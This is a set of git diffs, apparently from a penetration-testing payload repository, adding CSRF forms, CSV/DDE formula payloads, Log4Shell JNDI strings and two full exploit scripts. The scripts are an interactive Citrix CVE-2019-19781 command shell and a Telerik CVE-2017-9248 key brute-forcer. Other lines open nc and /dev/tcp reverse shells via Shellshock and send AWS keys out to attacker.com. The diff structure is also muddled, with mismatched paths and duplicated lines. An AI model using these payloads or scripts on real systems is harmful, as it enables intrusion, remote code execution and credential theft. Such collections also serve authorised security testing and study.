@@ -95,6 +104,12 @@ Remainder:
 ## Labs
 * [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
 ## References
 * https://www.owasp.org/index.php/CRLF_Injection
 * https://vulners.com/hackerone/H1:192749
 ## References
 * https://www.owasp.org/index.php/CRLF_Injection
--- a/Injection/Images/CSRF-CheatSheet.png
+++ b/Injection/Images/CSRF-CheatSheet.png
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -5,20 +5,31 @@
 ## Summary
 * [Tools](#tools)
 * [Methodology](#methodology)
 * [Payloads](#payloads)
-    * [HTML GET - Requiring User Interaction](#)
+    * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction)
-    * [HTML GET - No User Interaction)](#)
+    * [HTML GET - No User Interaction)](#html-get---no-user-interaction)
-    * [HTML POST - Requiring User Interaction](#)
+    * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
-    * [HTML POST - AutoSubmit - No User Interaction](#)
+    * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
-    * [JSON GET - Simple Request](#)
+    * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
-    * [JSON POST - Simple Request](#)
+    * [JSON GET - Simple Request](#json-get---simple-request)
-    * [JSON POST - Complex Request](#)
+    * [JSON POST - Simple Request](#json-post---simple-request)
    * [JSON POST - Complex Request](#json-post---complex-request)
 * [Bypass referer header validation check](#bypass-referer-header-validation)
    * [Basic payload](#basic-payload)
    * [With question mark payload](#with-question-mark-payload)
    * [With semicolon payload](#with-semicolon-payload)
    * [With subdomain payload](#with-subdomain-payload)
 * [Labs](#labs)
 * [References](#references)
 ## Tools
 * [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
 ## Methodology
 ![CSRF_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true)
@@ -27,18 +38,21 @@
 When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
 ### HTML GET - Requiring User Interaction
 ```html
 <a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
 ```
 ### HTML GET - No User Interaction
 ```html
 <img src="http://www.example.com/api/setusername?username=CSRFd">
 ```
 ### HTML POST - Requiring User Interaction
 ```html
@@ -48,6 +62,7 @@ When you are logged in to a certain site, you typically have a session. The iden
 </form>
 ```
 ### HTML POST - AutoSubmit - No User Interaction
 ```html
@@ -62,6 +77,28 @@ When you are logged in to a certain site, you typically have a session. The iden
 ```
 ### HTML POST - multipart/form-data with file upload - Requiring User Interaction
 ```html
 <script>
 function launch(){
    const dT = new DataTransfer();
    const file = new File( [ "CSRF-filecontent" ], "CSRF-filename" );
    dT.items.add( file );
    document.xss[0].files = dT.files;
    document.xss.submit()
 }
 </script>
 <form style="display: none" name="xss" method="post" action="<target>" enctype="multipart/form-data">
 <input id="file" type="file" name="file"/>
 <input type="submit" name="" value="" size="0" />
 </form>
 <button value="button" onclick="launch()">Submit Request</button>
 ```
 ### JSON GET - Simple Request
 ```html
@@ -72,8 +109,11 @@ xhr.send();
 </script>
 ```
 ### JSON POST - Simple Request
 With XHR :
 ```html
 <script>
 var xhr = new XMLHttpRequest();
@@ -87,6 +127,18 @@ xhr.send('{"role":admin}');
 </script>
 ```
 With autosubmit send form, which bypasses certain browser protections such as the Standard option of [Enhanced Tracking Protection](https://support.mozilla.org/en-US/kb/enhanced-tracking-protection-firefox-desktop?as=u&utm_source=inproduct#w_standard-enhanced-tracking-protection) in Firefox browser :
 ```html
 <form id="CSRF_POC" action="www.example.com/api/setrole" enctype="text/plain" method="POST">
 // this input will send : {"role":admin,"other":"="}
 <input type="hidden" name='{"role":admin, "other":"'  value='"}' />
 </form>
 <script>
 document.getElementById("CSRF_POC").submit();
 </script>
 ```
 ### JSON POST - Complex Request
 ```html
@@ -99,6 +151,51 @@ xhr.send('{"role":admin}');
 </script>
 ```
 ## Bypass referer header validation
 ### Basic payload
 ```
 1) Open https://attacker.com/csrf.html
 2) Referer header is ..
 Referer: https://attacker.com/csrf.html
 ```
 ### With question mark(`?`) payload
 ```
 1) Open https://attacker.com/csrf.html?trusted.domain.com
 2) Referer header is ..
 Referer: https://attacker.com/csrf.html?trusted.domain.com
 ```
 ### With semicolon(`;`) payload
 ```
 1) Open https://attacker.com/csrf.html;trusted.domain.com
 2) Referer header is ..
 Referer: https://attacker.com/csrf.html;trusted.domain.com
 ```
 ### With subdomain payload
 ```
 1) Open https://trusted.domain.com.attacker.com/csrf.html
 2) Referer headers is ..
 Referer: https://trusted.domain.com.attacker.com/csrf.html
 ```
 ## Labs
 * [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses)
 * [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method)
 * [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present)
 * [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session)
 * [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie)
 * [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie)
 * [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present)
 * [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken)
 ## References
@@ -114,4 +211,5 @@ xhr.send('{"role":admin}');
 - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
 - [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
 - [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](#https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
+- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
 - [Bypass referer check logic for CSRF](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -1,6 +1,6 @@
-# CSV Injection (Formula Injection)
+# CSV Injection
-Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
+Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
 ## Exploit
@@ -20,6 +20,20 @@ DDE ("cmd";"/C calc";"!A0")A0
 # msf smb delivery with rundll32
 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
 # Prefix obfuscation and command chaining
 =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
 =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
 +thespanishinquisition(cmd|'/c calc.exe'!A
 =         cmd|'/c calc.exe'!A
 # Using rundll32 instead of cmd
 =rundll32|'URL.dll,OpenURL calc.exe'!A
 =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
 # Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
 =    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A
 ```
 Technical Details of the above payload:
@@ -39,10 +53,11 @@ Any formula can be started with
 ## References
-* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
+* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection)
-* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
+* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
 * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
 * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
 * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
-* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
+* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
-* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
+* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
 * [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
--- a/CVE-2019-19781.py
+++ b/CVE-2019-19781.py
@@ -0,0 +1,51 @@
 #!/usr/bin/env python
 # https://github.com/mpgn/CVE-2019-19781
 # # #
 import requests
 import string
 import random
 import re
 import sys
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
 print("Found by Mikhail Klyuchnikov")
 print("")
 if len(sys.argv) < 2:
  print("[-] No URL provided")
  sys.exit(0)
 while True:
    try:
      command = input("command > ")
      random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
      print("[+] Adding bookmark", random_xml + ".xml")
      burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
                      random_xml, "NSC_NONCE": "c", "Connection": "close"}
      burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
      r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
      if r.status_code == 200:
        print("[+] Bookmark added")
      else:
        print("\n[-] Target not vulnerable or something went wrong")
        sys.exit(0)
      burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
      r = requests.get(burp0_url, headers=burp0_headers,verify=False)
      replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
      print("[+] Result of the command: \n")
      print(replaced)
    except KeyboardInterrupt:
            print("Exiting...")
            break
--- a/Exploits/Log4Shell.md
+++ b/Exploits/Log4Shell.md
@@ -0,0 +1,105 @@
 # CVE-2021-44228 Log4Shell
 > Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
 ## Summary
 * [Vulnerable code](#vulnerable-code)
 * [Payloads](#payloads)
 * [Scanning](#scanning)
 * [WAF Bypass](#waf-bypass)
 * [Exploitation](#exploitation)
    * [Environment variables exfiltration](#environment-variables-exfiltration)
    * [Remote Command Execution](#remote-command-execution)
 * [References](#references)
 ## Vulnerable code
 You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn](
 https://github.com/leonjza/log4jpwn)
 ```java
 public String index(@RequestHeader("X-Api-Version") String apiVersion) {
    logger.info("Received a request for API version " + apiVersion);
    return "Hello, world!";
 }
 ```
 ## Payloads
 ```bash
 # Identify Java version and hostname
 ${jndi:ldap://${java:version}.domain/a}
 ${jndi:ldap://${env:JAVA_VERSION}.domain/a}
 ${jndi:ldap://${sys:java.version}.domain/a}
 ${jndi:ldap://${sys:java.vendor}.domain/a}
 ${jndi:ldap://${hostName}.domain/a}
 ${jndi:dns://${hostName}.domain}
 # More enumerations keywords and variables
 java:os
 docker:containerId
 web:rootDir
 bundle:config:db.password
 ```
 ## Scanning
 * [log4j-scan](https://github.com/fullhunt/log4j-scan)
    ```powershell
    usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
                        [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
    python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
    python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
    ```
 * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
 ## WAF Bypass
 ```powershell
 ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
 # using lower and upper
 ${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
 ${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
 # using env to create the letter
 ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
 ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
 ```
 ## Exploitation
 ### Environment variables exfiltration
 ```powershell
 ${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
 # AWS Access Key
 ${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
 ```
 ### Remote Command Execution
 * [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
    ```ps1
    java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
    Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
    Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
    Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
    Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
    Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
    Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
    Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
    Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
    ```
 * [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
 ## References
 * [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day/)
 * [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
 * [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
--- a/Exploits/README.md
+++ b/Exploits/README.md
@@ -1,29 +1,71 @@
 # Common Vulnerabilities and Exposures
-Big CVEs in the last 5 years.
+## Tools
-## CVE-2014-0160 - Heartbleed
+- [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)
 - [Nuclei Templates - Community curated list of templates for the nuclei engine to find security vulnerabilities in applications](https://github.com/projectdiscovery/nuclei-templates)
 - [Metasploit Framework](https://github.com/rapid7/metasploit-framework)
 - [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com)
 The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
-## CVE-2014-6271 - Shellshock
+## Big CVEs in the last 5 years.
-Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
+### CVE-2017-0144 - EternalBlue
-```bash
+EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.
 echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
 ```
-## CVE-2017-5638 - Apache Struts 2
+Afftected systems:
 - Windows Vista SP2
 - Windows Server 2008 SP2 and R2 SP1
 - Windows 7 SP1
 - Windows 8.1
 - Windows Server 2012 Gold and R2
 - Windows RT 8.1
 - Windows 10 Gold, 1511, and 1607
 - Windows Server 2016
 ### CVE-2017-5638 - Apache Struts 2
 On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
-## CVE-2018-7600 - Drupalgeddon 2
+### CVE-2018-7600 - Drupalgeddon 2
 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
 ### CVE-2019-0708 - BlueKeep
 A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
 ### CVE-2019-19781 -  Citrix ADC Netscaler
 A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
 Affected products:
 - Citrix ADC and Citrix Gateway version 13.0 all supported builds
 - Citrix ADC and NetScaler Gateway version 12.1 all supported builds
 - Citrix ADC and NetScaler Gateway version 12.0 all supported builds
 - Citrix ADC and NetScaler Gateway version 11.1 all supported builds
 - Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
 ## Older, but not forgotten
 ### CVE-2014-0160 - Heartbleed
 The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
 ### CVE-2014-6271 - Shellshock
 Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
 ```powershell
 echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n"
 curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" 
 ```
 ## Thanks to
 * [Heartbleed - Official website](http://heartbleed.com)
 * [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
 * [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
 * [EternalBlue - Wikipedia](https://en.wikipedia.org/wiki/EternalBlue)
 * [BlueKeep - Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
--- a/CVE-2017-9248.py
+++ b/CVE-2017-9248.py
@@ -0,0 +1,362 @@
 # Author: Paul Taylor / @bao7uo
 # https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py
 # dp_crypto - CVE-2017-9248 exploit
 # Telerik.Web.UI.dll Cryptographic compromise
 # Warning - no cert warnings,
 # and verify = False in code below prevents verification
 import sys
 import base64
 import requests
 import re
 import binascii
 import argparse
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 requests_sent = 0
 char_requests = 0
 def getProxy(proxy):
    return { "http" : proxy, "https" : proxy }
 def get_result(plaintext, key, session, pad_chars):
    global requests_sent, char_requests
    url = args.url
    base_pad = (len(key) % 4)
    base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]
    dp_encrypted = base64.b64encode(
                                (encrypt(plaintext, key) + base).encode()
                            ).decode()
    request = requests.Request('GET', url + '?dp=' + dp_encrypted)
    request = request.prepare()
    response = session.send(request, verify=False, proxies = getProxy(args.proxy))
    requests_sent += 1
    char_requests += 1
    match = re.search("(Error Message:)(.+\n*.+)(</div>)", response.text)
    return True \
        if match is not None \
        and match.group(2) == args.oracle \
        else False
 def test_keychar(keychar, found, session, pad_chars):
    base64chars = [
                    "A", "Q", "g", "w", "B", "R", "h", "x", "C", "S", "i", "y",
                    "D", "T", "j", "z", "E", "U", "k", "0", "F", "V", "l", "1",
                    "G", "W", "m", "2", "H", "X", "n", "3", "I", "Y", "o", "4",
                    "J", "Z", "p", "5", "K", "a", "q", "6", "L", "b", "r", "7",
                    "M", "c", "s", "8", "N", "d", "t", "9", "O", "e", "u", "+",
                    "P", "f", "v", "/"
                  ]
    duff = False
    accuracy_thoroughness_threshold = args.accuracy
    for bc in range(int(accuracy_thoroughness_threshold)):
                                                # ^^ max is len(base64chars)
        sys.stdout.write("\b\b" + base64chars[bc] + "]")
        sys.stdout.flush()
        if not get_result(
                      base64chars[0] * len(found) + base64chars[bc],
                      found + keychar, session, pad_chars
                      ):
            duff = True
            break
    return False if duff else True
 def encrypt(dpdata, key):
    encrypted = []
    k = 0
    for i in range(len(dpdata)):
        encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))
        k = 0 if k >= len(key) - 1 else k + 1
    return ''.join(str(e) for e in encrypted)
 def mode_decrypt():
    ciphertext = base64.b64decode(args.ciphertext).decode()
    key = args.key
    print(base64.b64decode(encrypt(ciphertext, key)).decode())
    print("")
 def mode_encrypt():
    plaintext = args.plaintext
    key = args.key
    plaintext = base64.b64encode(plaintext.encode()).decode()
    print(base64.b64encode(encrypt(plaintext, key).encode()).decode())
    print("")
 def test_keypos(key_charset, unprintable, found, session):
    pad_chars = ''
    for pad_char in range(256):
        pad_chars += chr(pad_char)
    for i in range(len(pad_chars)):
        for k in range(len(key_charset)):
            keychar = key_charset[k]
            sys.stdout.write("\b"*6)
            sys.stdout.write(
                        (
                            keychar
                            if unprintable is False
                            else '+'
                        ) +
                        ") [" + (
                            keychar
                            if unprintable is False
                            else '+'
                        ) +
                        "]"
                    )
            sys.stdout.flush()
            if test_keychar(keychar, found, session, pad_chars[i] * 3):
                return keychar
    return False
 def get_key(session):
    global char_requests
    found = ''
    unprintable = False
    key_length = args.key_len
    key_charset = args.charset
    if key_charset == 'all':
        unprintable = True
        key_charset = ''
        for i in range(256):
            key_charset += chr(i)
    else:
        if key_charset == 'hex':
            key_charset = '01234567890ABCDEF'
    print("Attacking " + args.url)
    print(
        "to find key of length [" +
        str(key_length) +
        "] with accuracy threshold [" +
        str(args.accuracy) +
        "]"
    )
    print(
        "using key charset [" +
        (
            key_charset
            if unprintable is False
            else '- all ASCII -'
        ) +
        "]\n"
    )
    for i in range(int(key_length)):
        pos_str = (
            str(i + 1)
            if i > 8
            else "0" + str(i + 1)
        )
        sys.stdout.write("Key position " + pos_str + ": (------")
        sys.stdout.flush()
        keychar = test_keypos(key_charset, unprintable, found, session)
        if keychar is not False:
            found = found + keychar
            sys.stdout.write(
                          "\b"*7 + "{" +
                          (
                              keychar
                              if unprintable is False
                              else '0x' + binascii.hexlify(keychar.encode()).decode()
                          ) +
                          "} found with " +
                          str(char_requests) +
                          " requests, total so far: " +
                          str(requests_sent) +
                          "\n"
                      )
            sys.stdout.flush()
            char_requests = 0
        else:
            sys.stdout.write("\b"*7 + "Not found, quitting\n")
            sys.stdout.flush()
            break
    if keychar is not False:
        print("Found key: " +
              (
                found
                if unprintable is False
                else "(hex) " + binascii.hexlify(found.encode()).decode()
              )
              )
    print("Total web requests: " + str(requests_sent))
    return found
 def mode_brutekey():
    session = requests.Session()
    found = get_key(session)
    if found == '':
        return
    else:
        urls = {}
        url_path = args.url
        params = (
                    '?DialogName=DocumentManager' +
                    '&renderMode=2' +
                    '&Skin=Default' +
                    '&Title=Document%20Manager' +
                    '&dpptn=' +
                    '&isRtl=false' +
                    '&dp='
                  )
        versions = [
                    '2007.1423', '2007.1521', '2007.1626', '2007.2918',
                    '2007.21010', '2007.21107', '2007.31218', '2007.31314',
                    '2007.31425', '2008.1415', '2008.1515', '2008.1619',
                    '2008.2723', '2008.2826', '2008.21001', '2008.31105',
                    '2008.31125', '2008.31314', '2009.1311', '2009.1402',
                    '2009.1527', '2009.2701', '2009.2826', '2009.31103',
                    '2009.31208', '2009.31314', '2010.1309', '2010.1415',
                    '2010.1519', '2010.2713', '2010.2826', '2010.2929',
                    '2010.31109', '2010.31215', '2010.31317', '2011.1315',
                    '2011.1413', '2011.1519', '2011.2712', '2011.2915',
                    '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',
                    '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',
                    '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',
                    '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',
                    '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',
                    '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',
                    '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',
                    '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',
                    '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',
                    '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',
                    '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',
                    '2017.3.913'
                    ]
        plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'
        plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='
        plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
        plaintext3 = ';AllowMultipleSelection,False,3,False'
        if len(args.version) > 0:
            versions = [args.version]
        for version in versions:
            plaintext2_raw2 = version
            plaintext2 = base64.b64encode(
                            (plaintext2_raw1 +
                                plaintext2_raw2 +
                                plaintext2_raw3
                             ).encode()
                        ).decode()
            plaintext = plaintext1 + plaintext2 + plaintext3
            plaintext = base64.b64encode(
                            plaintext.encode()
                        ).decode()
            ciphertext = base64.b64encode(
                            encrypt(
                                plaintext,
                                found
                            ).encode()
                        ).decode()
            full_url = url_path + params + ciphertext
            urls[version] = full_url
        found_valid_version = False
        for version in urls:
            url = urls[version]
            request = requests.Request('GET', url)
            request = request.prepare()
            response = session.send(request, verify=False, proxies=getProxy(args.proxy))
            if response.status_code == 500:
                continue
            else:
                match = re.search(
                    "(Error Message:)(.+\n*.+)(</div>)",
                    response.text
                    )
                if match is None:
                    print(version + ": " + url)
                    found_valid_version = True
                    break
        if not found_valid_version:
            print("No valid version found")
 def mode_samples():
    print("Samples for testing decryption and encryption functions:")
    print("-d ciphertext key")
    print("-e plaintext key")
    print("")
    print("Key:")
    print("DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D")
    print("")
    print("Plaintext:")
